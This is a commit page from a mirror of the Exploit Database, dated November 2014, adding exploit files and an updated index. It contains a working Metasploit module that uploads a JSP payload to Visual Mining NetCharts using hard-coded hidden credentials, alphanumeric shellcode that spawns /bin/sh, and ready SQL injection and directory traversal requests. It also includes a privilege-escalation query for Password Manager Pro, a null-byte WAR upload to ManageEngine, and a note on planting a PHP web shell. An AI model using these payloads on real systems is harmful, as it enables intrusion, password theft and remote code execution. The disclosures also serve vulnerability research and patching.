bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 11_12_2014

Browse source
This commit is contained in:
Offensive Security 2014-11-12 04:43:24 +00:00
parent 21a8d11767
commit 73654ec124
12 changed files with 1093 additions and 6 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -31623,6 +31623,7 @@ id,file,description,date,author,platform,type,port
35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,metasploit,windows,local,0 35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,metasploit,windows,local,0
35102,platforms/php/webapps/35102.py,"vBulletin Tapatalk - Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80 35102,platforms/php/webapps/35102.py,"vBulletin Tapatalk - Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80
35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass Vulnerability",2014-10-29,gamehacker,hardware,remote,0 35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass Vulnerability",2014-10-29,gamehacker,hardware,remote,0
35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - (.wax) Buffer Overflow/DoS EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0
35106,platforms/php/webapps/35106.txt,"Cetera eCommerce 'banner.php' Cross Site Scripting Vulnerability",2010-12-11,MustLive,php,webapps,0 35106,platforms/php/webapps/35106.txt,"Cetera eCommerce 'banner.php' Cross Site Scripting Vulnerability",2010-12-11,MustLive,php,webapps,0
35107,platforms/cfm/webapps/35107.txt,"Mura CMS Multiple Cross Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps,0 35107,platforms/cfm/webapps/35107.txt,"Mura CMS Multiple Cross Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps,0
35108,platforms/php/webapps/35108.txt,"MyBB <= 1.4.10 'tags.php' Cross Site Scripting Vulnerability",2010-12-12,TEAMELITE,php,webapps,0 35108,platforms/php/webapps/35108.txt,"MyBB <= 1.4.10 'tags.php' Cross Site Scripting Vulnerability",2010-12-12,TEAMELITE,php,webapps,0
@ -31699,3 +31700,12 @@ id,file,description,date,author,platform,type,port
35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0
35191,platforms/php/webapps/35191.txt,"CMS Tovar 'tovar.php' SQL Injection Vulnerability",2011-01-11,jos_ali_joe,php,webapps,0 35191,platforms/php/webapps/35191.txt,"CMS Tovar 'tovar.php' SQL Injection Vulnerability",2011-01-11,jos_ali_joe,php,webapps,0
35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0 35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0
35204,platforms/php/webapps/35204.txt,"Another Wordpress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0
35205,platforms/linux/shellcode/35205.txt,"Position independent & Alphanumeric 64-bit execve(""/bin/sh\0"",NULL,NULL); (87 bytes)",2014-11-10,Breaking.Technology,linux,shellcode,0
35206,platforms/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"Mauricio Correa",php,webapps,0
35207,platforms/php/webapps/35207.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-11-10,"Mauricio Correa",php,webapps,0
35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager, Social IT Plus and IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0
35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0
35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001
35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80
35213,platforms/windows/remote/35213.html,"Internet Explorer 8 MS14-035 Use-After-Free Exploit",2014-11-10,"Ayman Sagy",windows,remote,0

Can't render this file because it is too large.

132
platforms/java/remote/35211.rb Executable file
View file

@ -0,0 +1,132 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
DEFAULT_USERNAME = 'Scheduler'
DEFAULT_PASSWORD = '!@#$scheduler$#@!'
SIGNATURE = 'was uploaded successfully and is now ready for installation'
def initialize(info = {})
super(update_info(info,
'Name' => 'Visual Mining NetCharts Server Remote Code Execution',
'Description' => %q{
This module exploits multiple vulnerabilities in Visual Mining NetCharts.
First, a lack of input validation in the administration console permits
arbitrary jsp code upload to locations accessible later through the web
service. Authentication is typically required, however a 'hidden' user is
available by default (and non editable). This user, named 'Scheduler',
can only login to the console after any modification in the user
database (a user is added, admin password is changed etc). If the
'Scheduler' user isn't available valid credentials must be supplied. The
default Admin password is Admin.
},
'Author' =>
[
'sghctoma', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-8516'],
['ZDI', '14-372']
],
'Privileged' => true,
'Platform' => %w{ linux win },
'Arch' => ARCH_JAVA,
'Targets' =>
[
['Visual Mining NetCharts Server 7.0', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 03 2014'))
register_options(
[
Opt::RPORT(8001),
OptString.new('USERNAME', [false, "The username to authenticate with"]),
OptString.new('PASSWORD', [false, "The password to authenticate with"])
], self.class)
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/', 'Admin', 'archive', 'upload.jsp'),
'vars_get' => { 'mode' => 'getZip' },
'authorization' => basic_auth(username, password)
})
if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)
Exploit::CheckCode::Detected
else
Exploit::CheckCode::Safe
end
end
def exploit
jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
print_status("#{peer} - Uploading JSP payload #{jsp_payload}...")
if upload(jsp_payload, payload.encoded)
print_good("#{peer} - JSP payload uploaded successfully")
register_file_for_cleanup("./webapps/Admin/archive/ArchiveCache/#{jsp_payload}")
else
fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
end
print_status("#{peer} - Executing payload...")
execute(jsp_payload, 1)
end
def execute(jsp_name, time_out = 20)
res = send_request_cgi({
'uri' => normalize_uri('/', 'Admin', 'archive', 'ArchiveCache', jsp_name),
'method' => 'GET',
'authorization' => basic_auth(username, password)
}, time_out)
res
end
def upload(file_name, contents)
post_data = Rex::MIME::Message.new
post_data.add_part(
contents,
'application/octet-stream',
nil,
"form-data; name=\"FILE1\"; filename=\"#{file_name}\x00Archive0101140101.zip\""
)
res = send_request_cgi({
'uri' => normalize_uri("/", 'Admin', 'archive', 'upload.jsp'),
'method' => 'GET',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s,
'vars_get' => { 'mode' => 'getZip' },
'authorization' => basic_auth(username, password)
})
if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)
true
else
false
end
end
def username
datastore['USERNAME'].blank? ? DEFAULT_USERNAME : datastore['USERNAME']
end
def password
datastore['PASSWORD'].blank? ? DEFAULT_PASSWORD : datastore['PASSWORD']
end
end

107
platforms/jsp/webapps/35209.txt Executable file
View file

@ -0,0 +1,107 @@
>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last
updated: 09/11/2014
>> Background on the affected products:
"ManageEngine OpManager is a network and data center infrastructure
management software that helps large enterprises, service providers
and SMEs manage their data centers and IT infrastructure efficiently
and cost effectively. Automated workflows, intelligent alerting
engines, configurable discovery rules, and extendable templates enable
IT teams to setup a 24x7 monitoring system within hours of
installation."
"Social IT Plus offers a cascading wall that helps IT folks to start
discussions, share articles and videos easily and quickly. Other team
members can access it and post comments and likes on the fly."
"Managing mission critical business applications is now made easy
through ManageEngine IT360. With agentless monitoring methodology,
monitor your applications, servers and databases with ease. Agentless
monitoring of your business applications enables you high ROI and low
TOC. With integrated network monitoring and bandwidth utilization,
quickly troubleshoot any performance related issue with your network
and assign issues automatically with ITIL based ServiceDesk
integration."
>> Technical details:
(#1 and #2 were previously released in September, see [2])
#3
Vulnerability: Remote code execution via file upload (unauthenticated
on OpManager and Social IT)
CVE-2014-7866
Constraints: no authentication needed for OpManager and Social IT;
authenticated in IT360
a)
POST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00
<... WAR file payload ...>
Affected versions: Unknown, at least OpManager v8 build 88XX to 11.4;
IT360 10.3/10.4; Social IT 11.0
b)
POST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00
<... WAR file payload ...>
Affected versions: Unknown, at least OpManager v8 build 88XX to 11.4;
IT360 10.3/10.4; Social IT 11.0
#4
Vulnerability: Blind SQL injection (unauthenticated)
CVE-2014-7868
Constraints: no authentication needed for OpManager and Social IT;
authenticated in IT360
a)
POST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]
POST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+
Affected versions: Unknown, at least the current versions (OpManager
11.3/11.4; IT360 10.3/10.4; Social IT 11.0)
b)
POST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi]
--> runs direct query in db!
POST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)
Affected versions: Unknown, at least the current versions (OpManager
11.3/11.4; IT360 10.3/10.4; Social IT 11.0)
>> Fix:
Upgrade to OpManager 11.3 or 11.4, then install patches [B] and [C].
This patch can be applied to all the applications but only for the
latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360
10.4).
The fix will be included in OpManager version 11.5 which should be
released sometime in late November or December 2014. No indication was
given for when fixed versions of IT360 and Social IT Plus will be
released.
[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix
Resolves #3
[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability
Resolves #4
[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12
http://seclists.org/fulldisclosure/2014/Nov/18
[2]
http://seclists.org/fulldisclosure/2014/Sep/110
[3]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt

129
platforms/linux/shellcode/35205.txt Executable file
View file

@ -0,0 +1,129 @@
#Title: Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
#Author: Breaking.Technology
#Date: 06 November 2014
#Vendor Homepage: http://breaking.technology
#Version: x86-64 platforms
#Classification: 64 bit shellcode
#Shellcode: http://breaking.technology/shellcode/alpha64-binsh.txt
# Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
# This shellcode will successfully execute every time as long as it is returned to.
# (c) 2014 Breaking Technology, Inc.
# http://breaking.technology/
#
# Assembled (87 bytes):
# XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V
#
# Assembly:
# user@host $ as alpha64-binsh.s -o alpha64-binsh.o ; strings alpha64-binsh.o
.section .data
.section .text
.globl _start
_start: # "XX"
pop %rax # 'X' add $0x8, %rsp ; so we dont overwrite the return pointer
pop %rax # 'X' add $0x8, %rsp ; so we dont overwrite the return pointer
prepare_ff: # "j0TYX45Pk13"
push $0x30 # 'j0'
push %rsp # 'T'
pop %rcx # 'Y' %rcx points to $0x30
pop %rax # 'X' %rax = 0x30
xor $0x35, %al # '45' %rax = 0x05
push %rax # 'P' (%rcx) = 0x05
imul $0x33, (%rcx), %esi # 'k13' %esi = 0x000000ff
prepare_f8: # "VX4047"
# mov %rsi, %rax
push %rsi # 'V'
pop %rax # 'X' %rax = %rsi = 0x000000ff
# mov $0xf8, %al
xor $0x30, %al # '40'
xor $0x37, %al # '47' %rax = 0x000000f8
write_negative_8: # "3At1At1qu1qv1qw"
# mov %eax, 0x74(%rcx)
xor 0x74(%rcx), %eax # '3At'
xor %eax, 0x74(%rcx) # '1At' 0xf8
# mov %sil, 0x75 - 0x77 + rcx
xor %esi, 0x75(%rcx) # '1qu' 0xff
xor %esi, 0x76(%rcx) # '1qv' 0xff
xor %esi, 0x77(%rcx) # '1qw' 0xff
# -8 is now on the stack as a 32-bit dword
# at 0x74(%rcx)
read_negative_8: # "Hcyt"
# move long (dword) to signed quadword
# mov -8, %rdi
movslq 0x74(%rcx), %rdi # 'Hcyt' %rdi is now -0x8 ( 0xfffffffffffffff8 )
get_return_pointer: # "14yH34y"
# mov -0x10(%rcx), %rsi <--- THIS IS OUR RETURN POINTER / LOCATION OF short_pc_rsi
# OR IN DECIMAL:
# mov -16(%rcx), %rsi
xor %esi, (%rcx, %rdi, 2) # '14y'
xor (%rcx, %rdi, 2), %rsi # 'H34y'
prepare_key: # "hj5XVX"
# put the xor key into %eax
push $0x5658356a # 'hj5XV' pushed backwards because x86 stack.
pop %rax # 'X'
decode_encoded_code: # "1FK"
xor %eax, 0x4b(%rsi) # '1FK' encoded_code ; pops & syscall decoded
decode_encoded_data: # "1FSH3FO"
xor %eax, 0x53(%rsi) # '1FS' encoded_data + 4 ; "/sh\0" decoded
xor 0x4f(%rsi), %rax # 'H3FO' encoded_data ; "/bin/sh\0" now in %rax
begin_stack_setup: # "PT"
push %rax # 'P' push "/bin/sh\0"
push %rsp # 'T' push pointer to /bin/sh
zero_rax: # "j0X40"
# xor %rax, %rax
push $0x30 # 'j0'
pop %rax # 'X'
xor $0x30, %al # '40' %rax is NULL
end_stack_setup: # "PP"
push %rax # 'P' push NULL
push %rax # 'P' push NULL
mov_3b_al: # "4u4N"
# mov $0x3b, %al
xor $0x75, %al # '4u'
xor $0x4e, %al # '4N' %al = 0x4e xor 0x75 = $0x3b
# this is for syscall ^
begin_stack_run: # "Z"
pop %rdx # 'Z' mov $0x00, %rdx ; %rdx = NULL
encoded_code: # "4jWS"
# 0x34 0x6a 0x57 0x53
# AFTER XOR MAGIC:
.byte 0x34 # "\x5e" pop %rsi ; %rsi = NULL
.byte 0x6a # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0"
.byte 0x57 # "\x0f"
.byte 0x53 # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL);
# syscall(%rax) = function(%rdi,%rsi,%rdx);
# syscall(0x3b) = execve("/bin/sh\0",NULL,NULL);
encoded_data: # "EW18EF0V" turns into "/bin/sh\0"
# 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56
# AFTER XOR MAGIC:
.byte 0x45 # /
.byte 0x57 # b
.byte 0x31 # i
.byte 0x38 # n
.byte 0x45 # /
.byte 0x46 # s
.byte 0x30 # h
.byte 0x56 # \0

65
platforms/multiple/webapps/35210.txt Executable file
View file

@ -0,0 +1,65 @@
>> Authenticated blind SQL injection in Password Manager Pro / Pro MSP
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 08/11/2014 / Last updated: 08/11/2014
>> Background on the affected products:
"Password Manager Pro (PMP) is a secure vault for storing and managing
shared sensitive information such as passwords, documents and digital
identities of enterprises."
>> Technical details:
PMP has a SQL injection vulnerability in its search function. A valid
user account is required to exploit the injection, however a low
privileged guest account is enough.
The application uses different database backends by default depending
on its version: versions < 6.8 use the MySQL backend and versions >=
6.8 use PostgreSQL. Single quotes are escaped with backslashes at the
injection point, but this can be somewhat avoided by double escaping
the slashes (\\'). In addition, injected strings are all modified to
uppercase. These two unintended "protections" make it difficult to
exploit the injection to achieve remote code execution.
However the injection can be abused in creative ways - for example to
escalate the current user privileges to "Super Administrator", which
has access to all the passwords in the system in unencrypted format.
This can be achieved by injecting the following queries: "update
AaaAuthorizedRole set role_id=1 where account_id=<userId>;insert into
ptrx_superadmin values (<userId>,true);".
A Metasploit module has been released that creates a new "Super
Administrator" account and exports PMP's password database in CSV
format. All passwords are exported unencrypted.
Vulnerability: Blind SQL injection in SEARCH_ALL parameter (multiple
pages affected)
Constraints: authentication needed (guest / low privileged user account)
CVE-2014-8498
POST /BulkEditSearchResult.cc
Affected versions: Unknown, at least v7 build 7001 to vX build XXX
CVE-2014-8499
POST /SQLAdvancedALSearchResult.cc
POST /AdvancedSearchResult.cc
Affected versions: Unknown, at least v6.5 to vX build XXX
COUNT=1&USERID=1&SEARCH_ALL=<injection here>
>> Fix:
Upgrade to version 7.1 build 7105
[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12
[2]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt

41
platforms/php/webapps/35204.txt Executable file
View file

@ -0,0 +1,41 @@
Exploit Title: Another Wordpress Classifieds Plugin sql injection and Cross Site Scripting
Author: dill
download: https://wordpress.org/plugins/another-wordpress-classifieds-plugin/Client
Webpage: http://awpcp.com/
SQL injection
Details:
The parameter “keywordphrase” is susceptible to a time-based blind SQL injection when doing a search for classifieds.
Proof-of-Concept (PoC)
Request:
POST /?page_id=16592 HTTP/1.1
Host: vulnerable.server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://vulnerable.server/?page_id=16592
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-1=1407957654; wp-settings-time-2=1408136814; PHPSESSID=uk871e0cssdnca8oesorbmg2b6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&searchpricemin=1&searchpricemax=2&select-country0.2917955784677633=&textfield-country0.2917955784677633=country®ions[0][country]=country&select-state0.3360776012424508=&textfield-state0.3360776012424508=state®ions[0][state]=State&select-city0.8672109586380441=&textfield-city0.8672109586380441=city®ions[0][city]=city
Exploit through sqlmap:
Copy post request to text file
sqlmap -r keywordphrase.txt -p keywordphrase --dbms=MySQL --level=5
-----------------
Place: POST
Parameter: keywordphrase
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&searchpricemin=1&searchpricemax=2&select-country0.2917955784677633=&textfield-country0.2917955784677633=country®ions[0][country]=country&select-state0.3360776012424508=&textfield-state0.3360776012424508=State®ions[0][state]=State&select-city0.8672109586380441=&textfield-city0.8672109586380441=City®ions[0][city]=City
Resolution: Developer was contacted and has since corrected the issues. Update to the latest version of the plugin

55
platforms/php/webapps/35206.txt Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: PHP-Fusion 7.02.07 SQL Injection
# Date: 06/11/2014
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.php-fusion.co.uk
# Software Link:
http://ufpr.dl.sourceforge.net/project/php-fusion/PHP-Fusion%20Archives/7.x/
PHP-Fusion-7.02.07.zip
# Version: 7.02.07
# Tested on: Linux OS (Debian)
# CVE : CVE-2014-8596
GET
/PHP-Fusion/files/administration/submissions.php?action=2&aid=9b23a9871adc75
cd&submit_id=1[SQL Injection]&t=n HTTP/1.1
Host: 192.168.0.105
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101
Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:
fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620
b17122152bf157283f; fusion68fF5_lastvisit=1414550801;
session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9;
fusion68fF5_visited=yes; has_js=1;
Connection: keep-alive
and
GET
/PHP-Fusion/files/administration/members.php?aid=9b23a9871adc75cd&status=4[S
QL Injection] HTTP/1.1
Host: 192.168.0.105
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101
Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:
fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620
b17122152bf157283f; fusion68fF5_lastvisit=1414550801;
session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9;;
fusion68fF5_visited=yes; has_js=1;
Connection: keep-alive
More informations (in Portuguese Br): https://www.xlabs.com.br/blog/?p=282

71
platforms/php/webapps/35207.txt Executable file
View file

@ -0,0 +1,71 @@
# Exploit Title: Progress OpenEdge Directory Traversal
# Date: 30/10/2014
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.progress.com
# Software Link: www.progress.com/products/openedge
# Version: 11.2
# Tested on: Windows OS
# CVE : CVE-2014-8555
The malicious user sends a malformed request that generates the file access
up directories as follows:
http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f.
.%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
or else
http://
target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../..
/../../windows/win.ini
And the application answers
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
More informations (in Br-Portuguese): https://www.xlabs.com.br/blog/?p=256
Thanks

271
platforms/php/webapps/35212.txt Executable file
View file

@ -0,0 +1,271 @@
Title: XCloner Wordpress/Joomla! backup Plugin v3.1.1 (Wordpress) v3.5.1 (Joomla!) Vulnerabilities
Author: Larry W. Cashdollar, @_larry0
Date: 10/17/2014
Download: https://wordpress.org/plugins/xcloner-backup-and-restore/
Download: http://extensions.joomla.org/extensions/access-a-security/site-security/backup/665
Downloads: Wordpress 313,647 Joomla! 515745 StandAlone 69175
Website: http://www.xcloner.com
Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/Xcloner-v3.1.1/
Vendor: Notified 10/17/14 Ovidiu Liuta, @thinkovi Acknowledged & no other response.
CVEID: Requested, TDB.
OSVDBID:114176,114177,114178,114179,114180
Description: “XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!.”
Vulnerabilities: There are multiple vulnerabilities Ive discovered in this plugin, they are as follows.
1. Arbitrary command execution.
2. Clear text MySQL password exposure through html text box under configuration panel.
3. Database backups exposed to local users due to open file permissions.
4. Unauthenticated remote access to backup files via easily guessable file names.
5. Authenticated remote file access.
6. MySQL password exposed to process table.
Arbitrary Command Execution
Plugin allows arbitrary commands to be executed by an authenticated user. The user will require administrative access rights to backup the database. User input when specifying your own file name is not sanitized as well as various other input fields.
PoC
All input fields I believe are vulnerable, Ive chosen the backup filename and a wget of sh.txt which is simply <?php passthru($_GET)?> into a writeable directory by www-data.
Screenshots available at the advisory URL above.
All user configurable variables are vulnerable, these variables need to be sanitized before being passed to the exec() function for execution.
$_CONFIG[tarpath]
$exclude
$_CONFIG['tarcompress']
$_CONFIG['filename']
$_CONFIG['exfile_tar']
$_CONFIG[sqldump]
$_CONFIG['mysql_host']
$_CONFIG['mysql_pass']
$_CONFIG['mysql_user']
$database_name
$sqlfile
$filename
Vulnerable code
./cloner.functions.php:
1672 exec($_CONFIG[tarpath] . " $exclude -c" . $_CONFIG['tarcompress'] . "vf $filename ./administrator/backups/index.html");
1673 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/database-sql.sql");
1674 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/htaccess.txt");
1675 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/perm.txt");
1695- if ($_REQUEST[cron_dbonly] != 1) {
1696: exec($_CONFIG[tarpath] . " $excl_cmd " . " -X " . $_CONFIG['exfile_tar'] . " -chv" . $_CONFIG['tarcompress'] . "f $filename ./");
1697- } else {
1698-
1699-
1700: exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "cvf $filename ./administrator/backups/database-sql.sql");
1701-
1702- if (is_array($databases_incl)) {
1703- foreach ($databases_incl as $database_name)
1704- if ($database_name != "") {
1705: exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/" . $database_name . "-sql.sql");
1706- }
1707- }
1708- }
--
1873- {
1874- //$sizeInBytes = filesize($path);
1875- $sizeInBytes = sprintf("%u", filesize($path));
1876: if ((!$sizeInBytes) and (function_exists("exec"))){
1877- $command = "ls -l \"$path\" | cut -d \" \" -f 5";
1878: $sizeInBytes = @exec($command);
1879- }
2010- if ($_CONFIG['sql_mem']) {
2011: exec($_CONFIG[sqldump] . " -h " . $_CONFIG['mysql_host'] . " -u " . $_CONFIG['mysql_user'] . " -p" . $_CONFIG['mysql_pass'] . " " . $dbname . " > " . $sqlfile . " $drop --allow-k
eywords " . $ex_dump);
2012-
2013- if (get_filesize($sqlfile) > 0)
2014- $databaseResult = LM_DATABASE_BACKUP_COMPLETED . ' ( ' . getFileSizeText(get_filesize($sqlfile)) . ' )';
2015- else
2016- $databaseResult = LM_MSG_BACK_14;
2017-
2018: exec("chmod 777 $sqlfile");
2019-
2020- return $sqlfile;
2021- }
./classes/fileRecursion.php
339- public static function getFileSize($file){
340-
341- $sizeInBytes = sprintf("%u", filesize($file));
342: if ((!$sizeInBytes) and (function_exists("exec"))){
343- $command = "ls -l \"$file\" | cut -d \" \" -f 5";
344: $sizeInBytes = @exec($command);
345- }
346-
347- return $sizeInBytes;
./restore/XCloner.php
290- }else{
291- if($ext == '.tgz') $compress = 'z';
292- else $compress = '';
293: shell_exec("tar -x".$compress."pf $file -C $_CONFIG[output_path]");
294- }
295-}
1077- if($_REQUEST['use_mysqldump'] == 1){
1078: echo shell_exec($_REQUEST['mysqldump_path']." -u ".$_REQUEST[mysql_username]." -p".$_REQUEST[mysql_pass]." -h ".$_REQUEST[mysql_server]." ".$_REQUEST[mysql_db]." < ".$sqlfile);
1079- return;
1080- }
Clear Text MySQL Database Password
The plugin also returns the MySQL clear text password via html text box back to the user in the configuration panel. A password should never be repeated back to you in clear text. The plugin will happily send this over a clear text connection.
Screenshots available at the advisory URL above.
Remote Database Download & Local File Permissions
The default recommend path for backup storage is /usr/share/wordpress/administrator/backups.
An index.html file is created under this directory to prevent casual browsing however the file names are easily predictable. From the installation instructions:
“XCloner is a tool that will help you manage your website backups, generate/restore/move so your website will be always secured! With XCloner you will be able to clone your site to any other location with just a few clicks. Don't forget to create the 'administrator/backups' directory in your Wordpress root and make it fully writeable.”
The format of the filenames are: backup_year-month-day_month_24hour_minute_domainname-sql-OPTIONS.tar where
OPTIONS could be either -sql-drop, -sql-nodrop or -nosql depending on options selected during time of backup.
The domain name is set by the HTTP_HOST header from line 88 of cloner.config.php:
88: $_CONFIG['mosConfig_live_site']=$_SERVER['HTTP_HOST'];
root@larry:/usr/share/wordpress/administrator/backups# ls -l
total 129432
-rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:15 backup_2014-10-29_10-14_testsite-sql-nodrop.tar
-rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:19 backup_2014-10-29_10-19_testsite-sql-nodrop.tar
-rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:24 backup_2014-10-29_10-24_testsite-sql-nodrop.tar
These file permissions also expose the contents of the databases to any local system users.
File naming convention code is as follows:
1327 $domainname = $_CONFIG['mosConfig_live_site'];
1351 if ($_REQUEST['bname'] == "") {
1352 if ($backupDatabase == 1) {
1353 if ($_REQUEST['dbbackup_drop']) {
1354 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-sql-drop' . $f_ext;
